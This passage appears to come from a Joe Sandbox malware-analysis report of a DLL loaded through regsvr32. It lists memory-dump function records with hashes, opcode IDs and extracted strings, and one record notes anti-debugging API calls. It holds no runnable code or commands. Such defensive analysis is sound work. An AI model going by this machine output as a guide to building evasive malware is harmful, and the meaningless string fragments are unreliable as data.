                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: TGA$K$W}
                                                                                                                            • API String ID: 0-588348707
                                                                                                                            • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                            • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                                                                            • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                            • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: :1,$@H${C=
                                                                                                                            • API String ID: 0-2737386091
                                                                                                                            • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                            • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                                                                            • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                            • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: prP$q<C$uL
                                                                                                                            • API String ID: 0-1414207395
                                                                                                                            • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                            • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                                                                            • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                            • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: :00D$Kl$(R'
                                                                                                                            • API String ID: 0-3661897330
                                                                                                                            • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                            • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                                                                            • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                            • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _getptd.LIBCMT ref: 00007FFC66D7597E
                                                                                                                              • Part of subcall function 00007FFC66D76550: RtlCaptureContext.KERNEL32 ref: 00007FFC66D7658F
                                                                                                                              • Part of subcall function 00007FFC66D76550: IsDebuggerPresent.KERNEL32 ref: 00007FFC66D7662D
                                                                                                                              • Part of subcall function 00007FFC66D76550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC66D76637
                                                                                                                              • Part of subcall function 00007FFC66D76550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFC66D76642
                                                                                                                              • Part of subcall function 00007FFC66D76550: GetCurrentProcess.KERNEL32 ref: 00007FFC66D76658
                                                                                                                              • Part of subcall function 00007FFC66D76550: TerminateProcess.KERNEL32 ref: 00007FFC66D76666
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                            • String ID: C
                                                                                                                            • API String ID: 1583075380-1037565863
                                                                                                                            • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                            • Instruction ID: 17db674a0fa1729c997376cfeade2c0c839309e05450c2140edbf27aa2f97c74
                                                                                                                            • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                            • Instruction Fuzzy Hash: 8651BA22A1C6AAC1FB689B22951177BDB50FB84B84F444035DECD4F785DE3DE005DB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale_getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3731964398-0
                                                                                                                            • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                                                                            • Instruction ID: 8ac41c1a22fcc2ba40543118fe52f4d89230be89ef818f43bba26d7f5ee6cd5f
                                                                                                                            • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                                                                            • Instruction Fuzzy Hash: C2218C32B0C6CADAEB2C9B25D9453E9B7A0FB88745F004136C69D8B695DF3CE064DA11
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale_getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3731964398-0
                                                                                                                            • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                            • Instruction ID: b9f7452f38d5c06427f13d8087676c3bff09c9ce9d9e619f8016b994a5125fa6
                                                                                                                            • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                            • Instruction Fuzzy Hash: 4721BE32B08699CAEB28CB21E4453EAB7A0FB88B84F404135DA9D8B354DF3CE514DB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$Y}
                                                                                                                            • API String ID: 0-941771097
                                                                                                                            • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                            • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                                                                            • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                            • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 7;}~$?C
                                                                                                                            • API String ID: 0-2633536567
                                                                                                                            • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                            • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                                                                            • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                            • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5"*$Wu
                                                                                                                            • API String ID: 0-3407213400
                                                                                                                            • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                            • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                                                                            • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                            • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: F/|$]M
                                                                                                                            • API String ID: 0-4182351379
                                                                                                                            • Opcode ID: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                            • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                                                                            • Opcode Fuzzy Hash: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                            • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ;SH$nK
                                                                                                                            • API String ID: 0-1681473137
                                                                                                                            • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                            • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
                                                                                                                            • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                            • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,$z
                                                                                                                            • API String ID: 0-3532108746
                                                                                                                            • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                            • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                                                                            • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                            • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: g/?$~l;
                                                                                                                            • API String ID: 0-1448562259
                                                                                                                            • Opcode ID: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                                                                            • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                                                                            • Opcode Fuzzy Hash: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                                                                            • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: JM$S
                                                                                                                            • API String ID: 0-422059844
                                                                                                                            • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                            • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                                                                            • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                            • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \4t$sT>
                                                                                                                            • API String ID: 0-514966222
                                                                                                                            • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                            • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                                                                            • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                            • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6 zT$lh
                                                                                                                            • API String ID: 0-3667112246
                                                                                                                            • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                            • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                                                                            • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                            • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 2Q'$t<p
                                                                                                                            • API String ID: 0-2959822804
                                                                                                                            • Opcode ID: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                                                                            • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                                                                            • Opcode Fuzzy Hash: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                                                                            • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 95s$\`s
                                                                                                                            • API String ID: 0-3495284040
                                                                                                                            • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                            • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
                                                                                                                            • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                            • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 3*$qMu
                                                                                                                            • API String ID: 0-4093015089
                                                                                                                            • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                            • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                                                                            • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                            • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #X$"n&E
                                                                                                                            • API String ID: 0-1188898577
                                                                                                                            • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                                                                            • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                                                                            • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                                                                            • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Bw~$fy
                                                                                                                            • API String ID: 0-1663007907
                                                                                                                            • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                            • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                                                                            • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                            • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: /0$XyLe
                                                                                                                            • API String ID: 0-3562702181
                                                                                                                            • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                            • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                                                                            • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                            • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: >I$>I
                                                                                                                            • API String ID: 0-3948471910
                                                                                                                            • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                            • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                                                                            • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                            • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: %'#$'1O"
                                                                                                                            • API String ID: 0-3508158491
                                                                                                                            • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                            • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                                                                            • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                            • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
